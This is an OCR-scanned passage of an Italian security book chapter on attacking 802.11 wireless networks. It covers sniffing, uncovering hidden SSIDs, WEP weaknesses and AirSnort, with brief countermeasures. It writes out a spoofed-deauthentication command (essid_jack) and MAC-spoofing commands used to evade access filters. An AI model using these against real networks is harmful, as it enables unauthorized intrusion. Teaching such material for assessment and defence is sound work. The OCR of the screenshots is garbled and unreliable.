361 22,117467 3_62:27:0e IEEE 802,11 Beacon frame 
22,219963 3_62:27:ce IEEE 802,11 Beacon frame 
22,322258 3_62:27:ce IEEE 802,11 Beacon frame 
22,424654 3_62:27;ce IEEE 802,11 Beacon frame 
22,527049 3_62:27:ce IEEE 802,11 Beacon frane 
22,629459 3_62:27:ce IEFE 802,11 Beacon frane 
Elli ELLI e ZA 
El Tagged parameters (25 butes) 
Tag Number: 0 (SSID parameter set) 
Tag length: 8 


interpretation: INSI[ 


Tag Numbert 1 (Supported Rates) 
Tag length: 
Tag interpretation: Supported rates: 1.0(B) 2. ceo) | 5,5(3) 11.0(B) [Mbit/sec] 


F_FF_FP_FF FF 00 04 75 ver 
30 9Ff_S2 Bi be Gf 15 ub'.0 


sretid' 
die. - NNO. 


srrsogne sesso 


_D [Reset][ap jy] nterpretatton oftag eran mgttag. interpretation), 8 5 bytes 


Figura 10.6 
| tre riquadri dell'interfaccia di Ethereal, 


Probabilmente avrete già utilizzato Ethereal per visualizzare pacchetti su reti Ether- 
net. Il suo utilizzo sulle reti 802.11 è simile, ma sono state aggiunte alcune nuove 
opzioni riguardanti le regole di filtrazione Ethereal esistenti, quando si utilizza la ca- 
tegoria wlan. 

Per un elenco completo delle sottocategorie di filtrazione wlan, consultate la docu- 
mentazione di Ethereal. 


AiroPeek NX 
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AiroPeek NX (http://www.wildpackets.com) è un tool di monitoraggio e analisi 
802.11 a pagamento, disponibile per Windows 2000 e Windows XP. Per Windows 
sono disponibili anche altre soluzioni commerciali per la cattura dei pacchetti 
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802.11; tuttavia, AiroPeek NX è il tool più utile e quello che ha il prezzo maggior- 
mente contenuto. Purtroppo, non esistono tool gratuiti per effettuare la cattura di 
pacchetti su sistemi operativi Windows, per cui, se proprio dovete operare in que- 
sto ambiente, l’unica possibilità è quella di utilizzare AiroPeek NX o un altro prodot- 
to commerciale. AiroPeek supporta le schede Lucent e Cisco 802.11b e alcune delle 
più recenti schede 802.11a. AiroPeek NX è stato progettato soprattutto per la dia- 
gnostica e l’analisi delle reti wireless, ma dispone anche di alcune opzioni per ren- 
derle maggiormente sicure (Figura 10.7). 


AiroPeek NX - [Capture 1] 


($Ò Fie Ect View Capture Statistica Tools 


De Gama 


rr pe i "" _Ll 
|Packets fiere i Ri [accoglie ___J 


Beacon —— FC=........ +SN=2033,FN= 0,BI=100,S5ID=Linksys,DS=3 


Broadcast 3 

Broadcast 3. 802,11 Beacon FC=.....ie ,3N=2034,FN= 0,BI=100,53ID=Linksys,DS=3 
Broadcast 3 802.11 Beacon FC=.. + ;SN=2035,FN= 0,BI=100,SS5ID=Linksys,DS=3 
Broadcast 3. 802.11 Beacon SH=2036, FN= 0,BI=100, SSTD=Linksya,DS=3 
Broadcast 3 802.11 Beacon 2037, i 
Broadcast 3. 802.11 Beacon 

Broadcast 4. 802.11 Beacon FC=....:è +» 19N=2040, FN= 0, BI=100, SSID=Linksys, ‘D$= 3 
Broadcast BI . 


802.11 Beacon 


pace mo TSE 


3. Information Element 


+» ,9N=2041,FN= 0,BI=100,5SID=Linksys,D3=3 
de A a i ate pico 


@ Element IM o ss 
$ Length: 7? 
è SSID: Linksys 
EF Information Element 
$ Element ID: 1 Supported Rates 
@ Length: 4 
$ Supported Rate: 0x8z ; 
9 Supported Rate 0x84 
$ Supported Kate: 0x8SB 
È Supported Rate: 0x96 
E) Y Information Element sl 


0000: 80 00 00 00 FF FF FF FY FF FF 00 06 25 853 12 00 ..... 
0016: 00 06 25 53 12 00 SO 7?F 4F F2 A0 3F 02 00 00 00 
0032: 64 00 ll 00 00 07 fil 01 04 82 d.. 


Fackets A Nodes API pis 7 KS SIN dA î fer TERNA 5 
For Help, press F1 He DE IOCO PC Card (5 vol) [Channet 1 4 


Figura 10.7 
La scheda NX Packets di AiroPeek. 


AiroPeek NX consente di effettuare la scansione dei canali con una frequenza defi- 
nita dall’utente, nonché di decriptare il traffico “al volo”, grazie a una chiave WEP in 
dotazione. Inoltre è molto facile configurare la filtrazione con AiroPeek NX ed è 
possibile salvare diverse combinazioni di filtri su altrettanti file modello. Questo 
consente di navigare rapidamente da un gruppo di siti all’altro durante l’esplorazio- 
ne iniziale della rete e di passare ad altri gruppi per un’analisi più approfondita. Ai- 
roPeek NX fornisce inoltre un’utile vista Nodes, in cui le stazioni rilevate sono rag- 
gruppate in base al loro indirizzo MAC; in questa vista sono inoltre visualizzati gli 
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indirizzi IP e i protocolli osservati per ciascuna di esse. La vista Peer Map presenta 
una matrice di tutti gli host rilevati sulla rete mediante le loro connessioni recipro- 
che. Questo può facilitare notevolmente il compito di visualizzare le relazioni tra 
punti di accesso e client. 


Identificazione delle difese 
per reti wireless e relative contromisure 


Questo non è un paragrafo dedicato all’hardening della rete o che spiega come 
bloccare i vostri punti di accesso; è dedicato semplicemente all’identificazione delle 
contromisure WLAN implementate e ai metodi per eluderle. Così come per qualsiasi 
altra rete o sistema bersaglio, è fondamentale stabilire quali sono i tipi di sistemi, 
dove sono ubicati e le loro configurazioni. Le WLAN, gli AP e i client wireless non 
differiscono tra loro. 

Le informazioni seguenti vi consentiranno di identificare i sistemi e stabilire quali tipi di 
misure di sicurezza sono stati implementati. Per esempio, potrete stabilire rapidamente 
se un sistema è privo di misure di sicurezza e può essere considerato un sistema di tipo 
“Open System Authentication”, Inoltre imparerete a distinguere la differenza tra un si- 
stema con il WEP implementato e la bit-length implementata per la chiave segreta con- 
divisa tramite l’analisi dell’intestazione 802.11 e del vettore di inizializzazione. Oltre ai 
controlli basati sull'infrastruttura, imparerete a stabilire se alcune funzionalità di sicu- 
rezza comuni implementate dal fornitore, quali le liste di controllo degli accessi (ACL) 
basate su MAC, sono state definite sui punti di accesso, e se sono stati effettuati aggior- 
namenti di protocollo o firmware sull’algoritmo WEP o sulla 802.11b. Infine, esporre- 
mo alcuni metodi per decriptare diversi livelli di crittografia, quali gli schemi PKI em- 
bedded, gli IPSec basati su gateway e le VPN application-layer, inclusi gli SSL tunnel. 
Per trarre il massimo beneficio dalla lettura di questo capitolo, occorrono alcune 
nozioni di base. Oltre all'analisi dei pacchetti (illustrata nel paragrafo precedente), 
dovete essere in grado di comprendere i concetti elementari delle tecnologie di crit- 
tografia e della gestione delle chiavi crittografiche. 

Di seguito sono elencate le risorse basilari per le tecnologie di crittografia. 


e http://ww.crypto.com: la pagina di Matt Blaze di risorse sulla crittogra- 
fia. Un’eccellente fonte di informazioni scientifiche sull'analisi degli algorit- 
mi crittografici e a carattere generale; 

e http://developer.netscape.com/docs/manuals/security/pkin/conten- 
ts.htm: una valida risorsa, messa a disposizione da Sun, utilizzabile come 
introduzione alla crittografia con chiavi pubbliche. 


e http://www-cs.engr.ccny.cuny.edu/-csmma/: un eccellente sito univer- 
sitario, curato dal professor Michael Anshel, contenente link a siti su quasi 
ogni tipo di tecnologia crittografica. 


© SSID 


Il SSID è la prima informazione necessaria per connettersi a una rete wireless. Le 
reti 802.11 utilizzano il SSID per distinguere le BSS le une dalle altre. Il SSID non è 
destinato a essere utilizzato come password o come misura di controllo degli acces- 
si; tuttavia spesso i fornitori inducono gli utenti a crederlo. L'acquisizione del SSID è 
semplice; tutto il software per wardriving illustrato in precedenza in questo capitolo 
è in grado di rilevare il SSID di una rete o il “nome della rete”. Se il punto di accesso 
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sotto tiro risponde a una Broadcast SSID Probe, la maggior parte dei driver delle 
schede wireless configurate con un SSID uguale a ANY sarà in grado di stabilire 
un'associazione con la rete wireless. Quando il SSID è impostato a ANY, general- 
mente il driver invia una probe request all'indirizzo di broadcast con un SSID di lun- 
ghezza 0. In questo modo qualsiasi punto cli accesso risponde a queste richieste (la 
maggior parte di essi risponde di default) ed emette una risposta contenente il ri- 
spettivo SSID e altre informazioni. Questo semplifica la vita all'utente, poiché in tal 
modo non è necessario ricordare a memoria il SSID per connettersi alla LAN wire- 
less; ovviamente però ciò aiuta anche l'aggressore ad acquisire queste informazioni, 
I SSID possono essere rilevati su diversi tipi di traffico 802.11. 
e  Beacon:sono inviati continuamente dal punto di accesso e possono essere 

osservati con uno sniffer wireless. La stringa del filtro Ethereal che consente 

di vedere unicamente i beacon è la seguente: 


wlan.fc.type==0 and wlan.fc.subtype== 


Se desiderate escludere i frame dei beacon (essi sono trasmessi costante- 
mente e sono d’intralcio), è sufficiente inserire l’istruzione precedente tra 
parentesi, premettendovi un |, nel modo seguente: 


!(wlan.fc.type==0 and wlan. fc.subtype==8) 


e Probe request: sono inviate dai sistemi client per connettersi alla rete wire- 
less. Se il client è configurato con un SSID, questo verrà mostrato nella ri- 
chiesta. Una probe request avente come SSID il valore null indica proba- 
bilmente un nome di rete “ANY” configurato per la scheda. 


e Probe response: sono inviate in risposta a una probe request. La probe re- 
quest può avere un SSID vuoto, oppure il SSID della rete a cui il client vuo- 
le connettersi. 


e Richieste di associazione e di riassociazione: sono effettuate dal client 
quando si connette o si riconnette alla rete, Le richieste di riassociazione 
hanno lo scopo di supportare il roaming wireless dei client da un punto di 
accesso all’altro all’interno dello stesso ESS, ma possono anche essere 
emesse quando il client esce dal raggio di copertura di un determinato AP e 
successivamente vi rientra. 

Se sulla rete che state esplorando le broadcast probe response sono state bloccate 0 
PSSID è stato eliminato dai beacon frame, dovete probabilmente attendere che un 
client cerchi di riassociarsi per acquisire il SSID. In questo potrà esservi di aiuto il tool 
essid jack, incluso nel toolkit Air-Jack (http://892.1ininja.net/). essid_jack 
invierà un frame per l'annullamento dell’autenticazione all'indirizzo di broadcast, con- 
traffatto atfinché sembri provenire dal punto di accesso. In questo modo tutti i client 
attivi per il canale in questione sono espulsi e forzati a riconnettersi alla WLAN. Le 
probe request del client e le risposte dell’AP conterranno il SSID “nascosto”, 

Per utilizzare essid_jack, specificate l'indirizzo BSSID e il canale della rete wireless 

che state cercando di enumerare, Di default, esso invierà il pacchetto all'indirizzo di 

broadcast che interessa tutti i client attivi; tuttavia potete anche specificare un singo- 

lo client MAC al target mediante lo switch -d, come mostrato di seguito: 


[root@localhost tools]# ./essid_jack -b 
00:40:96:54:1c:0b -d 00:02:2D:07:E2:E1 -c 11 -i ajQ 
Got it, the essid is (escape characters are c style): 
"tsunami" 
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Controllo degli accessi MAC 


Sebbene il controllo degli accessi a livello MAC non sia stato previsto nella specifica 
dell'802.11, la maggior parte dei fornitori ha implementato questa funzionalità per con- 
tribuire a rafforzare le difese dell’802.11, intrinsecamente vulnerabile. Quando si utilizza 
il controllo degli accessi a livello MAC, l'amministratore definisce una lista di indirizzi 
MAC di client “approvati”, cui è consentito connettersi al punto di accesso. Anche se 
questa procedura è probabilmente realizzabile su reti di piccole dimensioni, essa può ri- 
sultare particolarmente onerosa nelle reti più grandi, poiché presuppone che l’ammini- 
stratore abbia a disposizione gli indirizzi MAC di tutti i client wireless. A parte il carico di 
lavoro per l'amministratore, l'indirizzo MAC non costituisce un valido meccanismo di si- 
curezza, poiché è facilmente osservabile e riproducibile. Uno sniffer wireless consente 
di osservare qualsiasi MAC della stazione e in genere l'aggressore può modificare age- 
volmente l’indirizzo MAC. È infatti sufficiente che l'aggressore effettui il monitoraggio 
della rete, prenda nota dei client che riescono a collegarsi al punto di accesso e infine 
modifichi l'indirizzo MAC affinché corrisponda a quello di uno degli client attivi. 
Poiché, come si è detto, l'utilizzo del controllo degli accessi a livello MAC non è stato 
definito nella specifica dell'802.11, non c'è un flag di pacchetto che lo indichi, ma ge- 
neralmente potete dedurlo. Se avete un SSID e una chiave WEP corrette ma essi non 
consentono ancora di associarsi, è possibile che venga utilizzata la filtrazione MAC (0 
un altro schema, per esempio l'802.1x). Con AiroPeek NX c'è un modo semplice per 
osservare le relazioni dei sistemi sulla rete wireless; nella scheda Peer Map, mostrata 
nella Figura 10.8, sono visualizzati i vari sistemi e le altre stazioni con cui ciascun si- 
stema è in comunicazione, Come si può vedere, tutti i nodi stanno comunicando con 
la stazione 00:07:0E:B9:94:32, per cui essa è con ogni probabilità il punto di accesso, 


Packets receive RARI, Memory usage: 


Pr c70 MM > [accorsi __] 


| MapType: [Physical Map + 
Node Visibilty Criteria 
| MaxNodes: -=@ACP 


Li | so 
| Traffic Type: fai 


00:20:E0:88:FB:28 


00:20:E0:39:09/E6 | 
10:40 96 58:38.IF | | Order Highest || 
| | Statistic: {Total Pack | 
0:40:96.SE:S8:1 | Flow Dir eni | 
00-60:B3:67:50-40 


{rode Counts Summary 
Showing up to 50 
physical nodes with the 
highest total packets 
sent 


Visible: 18 
User 


00:02:20:65:AE9C 


00:B0:D0:7E:92:15 


00:40:96:S8: FS 


Figura 10.8 
La scheda Peer Map. 
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C) II WEP 


La maggior parte dei tool per wardriving è in grado di indicare se una rete utilizza o 
meno la crittografia WEP. NetStumbler mostrerà un piccolo lucchetto nell’icona del- 
le reti e indicherà “WEP” nella colonna Encryption quando viene rilevata la critto- 
grafia WEP. Kismet inserirà una “Y” nella colonna sotto la W (W sta per WEP) quan- 
do identifica reti criptate. 

Gli sniffer wireless mostreranno anche lo stato del WEP. tcpdump utilizzerà il flag 
“PRIVACY” quando viene rilevato il WEP e mostrerà l'TV per ciascun pacchetto, 
quando esso viene acquisito, come mostrato di seguito: 


90:30:36.943042 Beacon (Aironet_350) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 6, 
PRIVACY 

00:30:36.948759 Data IV:1aa7f6 Pad 
00:30:36.949722 Data IV:1ba7f6 Pad 
00:30:36.958387 Data IV:1ba7f6 Pad 
00:30:36.959349 Data IV:1ca7f6 Pad 
00:30:36.968942 Data IV:1ca7f6 Pad 
00:30:36.970242 Data IV:1da7f6 Pad KeyID 
00:30:36.978462 Data IV:1da7f6 Pad @ KeyID 


® KeyID 
D) 
[) 
D) 
l) 
0) 
È) 
00:30:36.979718 Data IV:1ea7f6 Pad 0 KeyID 
l) 
l) 
D) 
0) 
0) 
D) 


KeyID 
KeyID 
KeyID 
KeyID 


00:30:36.988863 Data IV:1ea7f6 Pad 0 KeyID 
00:30:36.990004 Data IV:1fa7f6 Pad 0 KeyID 
00:30:36.998934 Data IV:1fa7f6 Pad 0 KeyID 
00:30:37.000148 Data IV:20a7f6 Pad 0 KeyID 
00:30:37.008549 Data IV:20a7f6 Pad 0 KeyID 
00:30:37.009741 Data IV:21a7f6 Pad 0 KeyID 


esseseseseseoeoececeeseasae 


Modalità di accesso (hacking delle 802.11) 


In base alla collaudata metodologia di attacco illustrata in questo libro, l’accesso alla 
rete è la fase della valutazione in cui l'aggressore o il collaudatore, a seconda dei ca- 
si, sfrutta le informazioni raccolte durante le fasi iniziali della valutazione stessa. 
L'obiettivo di ogni valutazione o tentativo di penetrazione in un sistema è quello di 
ottenere l’accesso come amministratore o a livello di root. Affinché questo sia possi- 
bile, l'aggressore deve tuttavia conoscere alcune informazioni dettagliate sul siste- 
ma, sull’applicazione e sulla configurazione. 

Nel campo delle reti wireless e 802.11, le modalità di accesso ai sistemi sono si- 
gnificativamente diverse da quelle per i sistemi “cablati”. Molto spesso, questo è 
dovuto all'assenza di una robusta crittografia implementata con il WEP, che con- 
sente all’aggressore di carpire chiavi deboli e dati trasmessi pertinenti. Anche se 
l'aggressore è riuscito ad accedere alla chiave WEP dell’AP, questo non è suffi- 
ciente per penetrare nella WLAN; tuttavia le difficoltà da affrontare per acquisire 
le poche informazioni mancanti per ottenere l'accesso sono risibili al confronto 
delle conoscenze e abilità necessarie per configurare e utilizzare un sistema in 
grado di effettuare il cracking in ambiente wireless. Come noterete, sono dispo- 
nibili svariati metodi per accedere ai sistemi, corrispondenti a diversi gradi di 
difficoltà. 
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O) SSID 


Dopo aver individuato il SSID, per utilizzarlo dovete riconfigurare la vostra interfac- 
cia wireless. Sui sistemi operativi Windows, di solito il fornitore della scheda forni- 
sce un'utility per la riconfigurazione delle impostazioni della scheda, o un’interfac- 
cia contenuta nel driver stesso per la riconfigurazione del SSID, Di seguito è mostra- 
ta la schermata di configurazione per una scheda wireless SMC e le impostazioni 
dei suoi driver. Il nome della rete è stato cambiato in “Linksys”, il SSID della rete a 
cui desideriamo connetterci. 


Connect Wireless LAN Utility 


Per quanto riguarda Linux, la maggior parte dei driver supporta l'interfaccia iwcon- 
g. una versione wireless del comando ifconfig utilizzata per configurare para- 
i di base di una rete 802.11 ndr] il SSID, Per modificare il SSID con iwconfig, 


telocalhost root]# iwconfig ethi essid tsunami 


istemi BSD quali OpenBSD e FreeBSD si utilizza il comando wicontrol, 
insente di modificare parametri delle schede che si servono del driver wi 
lan) e di gestire i parametri di configurazione specifici di una rete 802,11. 
mbiare il SSID mediante wicontrol, fate riferimento al seguente esempio, 
i l'interfaccia che desideriamo modificare è wid e il nome della rete sotto 
è Lucent: 


Wicontrol -I wi® -n Lucent 
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Controllo degli accessi MAC 


Dopo aver acquisito una lista di indirizzi MAC utilizzabili, dovete riconfigurare il no- 
stro sistema per utilizzare un nuovo MAC, Nel caso dei sistemi Windows, la proce- 
dura varia a seconda del driver. Alcuni driver meno recenti consentono di riconfigu- 
rare l'indirizzo MAC nelle proprietà dell’interfaccia; tuttavia molti fornitori hanno in 
seguito disattivato questa funzionalità. Alcune utility facilitano la risoluzione di que- 
sto problema; una di esse è Bwmachak, creata da BlackWave. Bwmachak consente 
di modificare l'indirizzo MAC di una scheda wireless Orinoco sostituendolo con un 
indirizzo da voi specificato, Per utilizzare Bwmachak, rimuovete prima la scheda, 
quindi eseguitelo nel modo seguente (00:09:E8:B4CB:E8 è il MAC che intendiamo 
utilizzare): 


E:\>BWMACHAK.exe 0009E8B4CBE8 


Dopo aver eseguito il comando, reinstallate la scheda ed eseguite ipconfig /all 
per verificare che l’indirizzo MAC sia stato effettivamente modificato. 

Nei sistemi Linux è possibile utilizzare il comando ifconfig per modificare il MAC. 
Dovrete visualizzare l'interfaccia, quindi specificare il nuovo indirizzo hardware 
Ethernet e, infine, chiudere l’interfaccia e verificare i risultati. Ecco un esempio di 
sequenza dei comandi da utilizzare. Come potete vedere, l'interfaccia wireless è 
ethi e il MAC che desideriamo utilizzare è 00:02:2D:07:E1:FF: 


[root@localhost root]# ifconfig ethi down 
[root@localhost root]# ifconfig ethi hw ether 00:02:2D:07:E1:FF 
[root@localhost root]# ifconfig ethi up 
[root@localhost root]# ifconfig ethi 
ethi Link encap:Ethernet HWaddr 00:02:2D:07:E1:FF 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:15 errors:2388 dropped:0 overruns:0 frame:2388 
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 
collisions:9 txqueuelen:100 
RX bytes:720 (720.0 b) TX bytes:3300 (3.2 Kb) 
Interrupt:3 Base address:0x100 


Anche nei sistemi FreeBSD si utilizza il comando ifconfig, ma con qualche lieve 
differenza. Dovete chiudere l’interfaccia prima di applicare le modifiche, così come 
in Linux, ma in questo caso è necessario omettere hw e i due punti nell’indirizzo 
stesso: 


# ifconfig fxp@ ether 00022d07e1ff 


A questo punto, visualizzate l'interfaccia e verificate che le modifiche abbiano pro- 
dotto i risultati desiderati. 

Gli utenti di OpenBSD possono servirsi dell’utility sea per modificare l'indirizzo MAC, 
perché la versione fornita di ifconfig non supporta tale funzionalità. Poiché non esi- 
ste un sito ufficiale da cui scaricare sea, il modo più semplice per trovarlo è una ricer- 
ca su Google dei termini “openbsd” e “sea.c”. Il funzionamento di sea è molto sem- 
plice, come mostrato dall'esempio seguente. In questo codice, wi®d è l'interfaccia 
wireless e 00:02:2D:07:E1:FF è l'indirizzo MAC che intendiamo utilizzare: 


# sea -v wi0 00:02:2D:07:E1:FF 
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® WEP 


Il WEP (Wired Equivalent Privacy) è uno standard definito dall'IEEE per assicurare 
uno schema di protezione OSI Layer 2 alle reti wireless 802.11. L'obiettivo del WEP 
non è quello di assicurare una protezione completa alla rete ma, piuttosto, quello di 
proteggere i dati da coloro che, in modo passivo e inconsapevole, rimangono in 
ascolto sulla WLAN. Molti credono erroneamente che l'algoritmo WEP sia un pro- 
dotto per la sicurezza con funzionalità di autenticazione garantita e crittografia; ma 
tali finalità non sono state previste dallo standard 802.11. 

L'algoritmo WEP si basa su una chiave segreta messa in comune tra l’AP e il nodo 
del client, che in genere è costituito da una scheda wireless su un laptop. Il WEP 
utilizza poi questo segreto condiviso per criptare tutti i dati che vengono scambiati 
tra due nodi. C'è un equivoco abbastanza diffuso, in base al quale il WEP assicure- 
rebbe l’autenticazione sulla rete tramite un segreto condiviso. Se su una WLAN vie- 
ne implementato il WEP, chiunque non sia messo al corrente di tale segreto non 
sarà in grado di connettersi alla rete in questione. Pertanto la rete viene ritenuta si- 
cura. L'algoritmo WEP non cripta l’header 802.11 e nemmeno l'IV Unitialization 
Vector) o le parti ID del pacchetto (Figura 10.9). 


Mo Tm ] Mm ]_ _ |] 


KAKAKKA 
Dati cifrati = XXXXXX 
PO. 0 0.0,0.4 


Figura 10.9 
Struttura dei pacchetti IEEE 802.1 |, 


RC4, un algoritmo crittografico per la cifratura a stream creato da RSA, cripta costan- 
temente i dati scambiati tra i due nodi, creando in tal modo un tunnel virtuale com- 
pletamente criptato. In ambito wireless generalmente l’RC4 può servirsi di una chia- 
ve segreta condivisa a 64 oppure a 128 bit come “seme” per gli stream RC4, Uno dei 
problemi che si verificano con la chiave segreta condivisa risiede nel fatto che 24 
dei bit sono derivati direttamente dall’TV, che è in chiaro. Come diremo in seguito, 
molti attacchi sfruttano il campo IV non criptato. I dati del pacchetto vengono poi 
criptati con la chiave segreta e alla loro fine viene accodato il checksum del pac- 
chetto stesso. 
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Attacchi all’algoritmo WEP 


L'algoritmo WEP, poco dopo il lancio commerciale e la sua implementazione negli 
AP wireless e nelle schede dei client, fu oggetto di numerosi attacchi di vario tipo: 
attacchi passivi, attivi, di tipo dizionario, basati sulla lunghezza della chiave e One- 
To-One o Man-In-The-Middle, Tuttavia, in genere, la maggior parte degli attacchi si 
basava su tecniche di forza bruta. Tali tecniche consentono all’'aggressore di prova- 
re intere serie di chiavi, esplorando tutte le possibilità, alla ricerca dell'unica chiave 
corretta. Un'altra categoria di attacchi al WEP si basava sull'analisi degli IV in corre- 
lazione con il primo byte di output RC4. 

Come si è già detto, gli attacchi a forza bruta sono comunemente utilizzati per sfrut- 
tare alcuni dei principali punti deboli contenuti nell’algoritmo WEP, in particolare 
nella determinazione della chiave segreta condivisa. Gli attacchi passivi (cioè attac- 
chi che non richiedono l'invio di pacchetti) vi consentono di carpire pacchetti 
802.11 ed effettuare calcoli su tali pacchetti sul vostro computer. Questo tipo di at- 
tacco non si propone di compromettere altri sistemi rimuovendoli dalla rete, o di 
contraffare pacchetti diretti ai sistemi, quanto piuttosto di raccogliere informazioni 
sui client della rete, sulle funzionalità di sicurezza implementate e sulla configura- 
zione degli AP, oltre eventualmente a eseguire il crack della chiave WEP. Tramite 
l’analisi del traffico, potete in teoria stabilire quali servizi vengono eseguiti, quali 
sono i metodi di crittografia e autenticazione, se è implementato uno schema di au- 
tenticazione basato su MAC e qual è la dimensione della chiave (espressa in bit). 
Gli unici attacchi passivi diretti all’algoritmo WEP sono il cracking delle chiavi e 
quello dei pacchetti. L'attacco inizia con l'acquisizione di un numero notevole di 
pacchetti provenienti da un numero potenzialmente elevato di client (la probabilità 
di successo dell'attacco aumenta all'aumentare del numero dei pacchetti). Poiché 
l'IV viene trasmesso come testo in chiaro, potete effettuare l’analisi dei pacchetti 
sulla base del client e dell’IV corrispondenti. Quando disponete di due pacchetti 
che utilizzano il medesimo IV, potete effettuare su di essi lo XOR e ottenere un uni- 
co XOQR dei pacchetti. In tal modo potete dedurre informazioni sui pacchetti e scar- 
tare ulteriori possibilità nello spazio delle chiavi per gli attacchi a forza bruta sul 
messaggio. Una volta che lo XOR, il testo criptato e il testo in chiaro di un pacchetto 
sono stati determinati, risulta estremamente semplice individuare il segreto condivi- 
so, poiché esso è stato utilizzato per creare lo XOR. 

L’altro tipo di attacco consiste nella semplice determinazione mediante metodo a 
forza bruta della chiave segreta condivisa. Potete tentare di decriptare il messaggio 
esattamente come lo decifrerebbe un AP, verificando il successo tramite il check- 
sum. Sfruttando i punti deboli degli TV, potete effettuare attacchi di tipo dizionario 
su checksum WEP in qualche minuto o addirittura qualche secondo, a seconda del- 
la lunghezza della lista delle parole e delle prestazioni della CPU. Un attacco a forza 
bruta completo su uno spazio delle chiavi a 40 bit richiede solo qualche settimana 
quando viene eseguito su un sistema singolo. 

Quasi tutti gli attacchi attivi contro l'algoritmo WEP non puntano a individuare la chia- 
ve segreta condivisa, ma a iniettare pacchetti negli stream 802.11 correnti. Tuttavia, in 
ogni caso, occorre prima sapere qual è il MAC dell’AP e se viene applicato il WEP, 
nonché conoscere la lunghezza in bit e la chiave (se implementata). Ora che sapete 
cosa vi occorre, se il WEP è disattivato, le difficoltà connesse all’utilizzo di una tecnica 
di iniezione di pacchetti sono risibili. In entrambi i casi, potrete contraffare i pacchetti 
che desiderate iniettare e inviarli. Tra i tool che utilizzano alcune di queste tecniche 
occorre segnalare Air-Jack e Libradiate (di essi discuteremo in seguito). 
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Protezione del WEP 


Diversi fornitori, tra cui Cisco, Orinoco e Intel, hanno sviluppato implementazioni 
maggiormente sicure dell’algoritmo WEP, della schedulazione delle chiavi, o del firm- 
ware dei loro prodotti. WEP-Plus è stato sviluppato come aggiornamento del firm- 
ware per gli AP e le schede wireless; esso prevede la modifica dell’attuale algoritmo 
di creazione degli IV incorporato nel WEP. WEP-Plus utilizza un algoritmo più sicuro 
per determinare e mascherare il campo IV. Aicuni fornitori di prodotti PKI, tra cui 
Baltimore Technologies e Entrust, hanno sviluppato le rispettive tecnologie PKI e 
VPN in modo da renderle compatibili in ambiente wireless. In questo caso, i client 
wireless devono autenticarsi sulla rete tramite un server dei certificati. Se l’autentica- 
zione ha successo, all'utente viene consentito di connettersi alla rete tramite un tun- 
nel VPN criptato. Questo tipo di protezione è simile alle soluzioni proposte da alcuni 
fornitori di minore importanza, i quali irrobustiscono le loro soluzioni VPN wireless 
utilizzando un tunnel SSL o IPSec sovrapposto al WFP. È scontato che i dati possono 
essere protetti grazie all’ulteriore crittografia a livello di applicazione e di trasporto; 
tuttavia le effettive sessioni wireless non sono tuttora sicure. Con questa soluzione, gli 
IV sono ancora in chiaro e non opportunamente randomizzati. 

Il WEP presenta alcuni problemi di sicurezza insiti nel protocollo, nell’implementa- 
zione e nelle modalità di applicazione da parte di fornitori e utenti. Purtroppo, 
l'802.11 è molto allettante poiché consente all'utente di comunicare senza cavi; per- 
tanto la tecnologia wireless è destinata a sopravvivere. La strategia di difesa consiste 
nella realizzazione di un sistema di sicurezza a più livelli, con diversi schemi di crit- 
tografia e autenticazione, e nel rivolgersi unicamente a fornitori che si sono fatti ca- 
rico dei problemi di sicurezza degli IV e del vulnerabile KSA WEP. 


Tool che sfruttano i punti deboli del WEP 


Esistono tool che consentono o semplificano l’automatizzazione dell'attacco dei 
punti deboli del WEP. Nella maggior parte dei casi, i tool utilizzano una combina- 
zione di tecniche di cattura di pacchetti e crack di pacchetti per sfruttare questi pun- 
ti deboli. 


® AirSnort 


Diffusione: 8 
Semplicità: 7 
Impatto: 9 
Fattore di rischio: 8 


Il tool AirSnort (http://airsnort.shmoo.com/) è un insieme di script e programmi 
frutto delle ricerche effettuate da Tim Newsham, dall’University of Maryland e 
dall’University of California di Berkeley. Esso è di gran lunga il tool per Linux più 
popolare e noto tra gli addetti ai lavori ed è utilizzato specificamente per eseguire il 
crack di pacchetti wireless. In origine, si trattava di un tool a riga di comando per Li- 
nux che consentiva unicamente di catturare pacchetti wireless 802.11b e di tentare il 
crack di pacchetti sfruttando la vulnerabilità degli IV. In seguito esso si è evoluto: è 
stato dotato di una GUI, consente la rapida configurazione del canale da esplorare e 
di specificare la lunghezza in bit della chiave WEP. 
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Per utilizzare AirSnort, dovete per prima cosa compilare e installare il codice sorgente. 
Al momento in cui scriviamo, si può utilizzare il comune comando ./configure, 
make, make install per l'installazione di AirSnort. A questo punto, eseguirete Air- 
Snort da una riga di comando, e, purché siate in una sessione X-Windows, potrete uti- 
lizzare la GUI. In questo caso, eseguirete AirSnort in una modalità di scansione per 
stabilire quali AP sono presenti nel raggio di copertura e se è in atto una trasmissione. 
Come potete vedere nella figura seguente, AirSnort ha identificato sei AP; su due di 
essi sono state implementate funzionalità WEP. Occorre catturare diversi numeri di 
pacchetti affinché i vari tipi di attacchi possano funzionare; tuttavia, la GUI di AirSnort 
GUI semplifica tale procedura aggiungendo gli utili e pratici pulsanti Start e Stop. 


File Edit Settings Help 


O scan | Network device [wiano 40 bit crack breadth: | do R 


Si lore: | font 

® channel (3 | Card type |Prism2 fvian-ng) IO | 126 bit crack breadth: 2 (5) | 

(ct —esso — = TREE vo Ca PT cast scen Tan ica î spad cina | 

I___00:40:96:40:E3:4 Y £7.028! 3008 | 
00:40:05:DF:094F default Y ARAA:03 
00:60:83:67:6C40 proxim 00:00:00 


00:40:96:54:1 C:08 Aironet_350 00:00:00 
00:04:75:62:27:CE =—=—INSIDIAE 00:00:00 
FF:FF-FE:FF:FF:FF 00:00:00 


© Contromisure ad AirSnort 


Attualmente, le contromisure per tutti gli sniffer e cracker di pacchetti WLAN sono piut- 
tosto elementari. Innanzitutto, è opportuno che implementiate il WEP su tutti i vostri 
AP, con una lunghezza della chiave pari a 128 bit. Quando si seleziona una chiave 
WEP, è essenziale scegliere una chiave segreta che non corrisponda a un termine pre- 
sente in un dizionario, se possibile una chiave contenente un insieme di caratteri nume- 
rici, alfabetici e caratteri speciali. L'ideale sarebbe l'utilizzo di una chiave WEP con una 
lunghezza superiore a otto caratteri, poiché questo aumenta notevolmente il tempo ne- 
cessario a condurre a termine attacchi basati sulla forza bruta nello spazio delle chiavi, 
rispetto a una passphrase a 6 caratteri. Occorre modificare il SSID per l’AP, evitando di 
utilizzare l'impostazione di default; se poi il fornitore fornisce un fix per l'algoritmo 
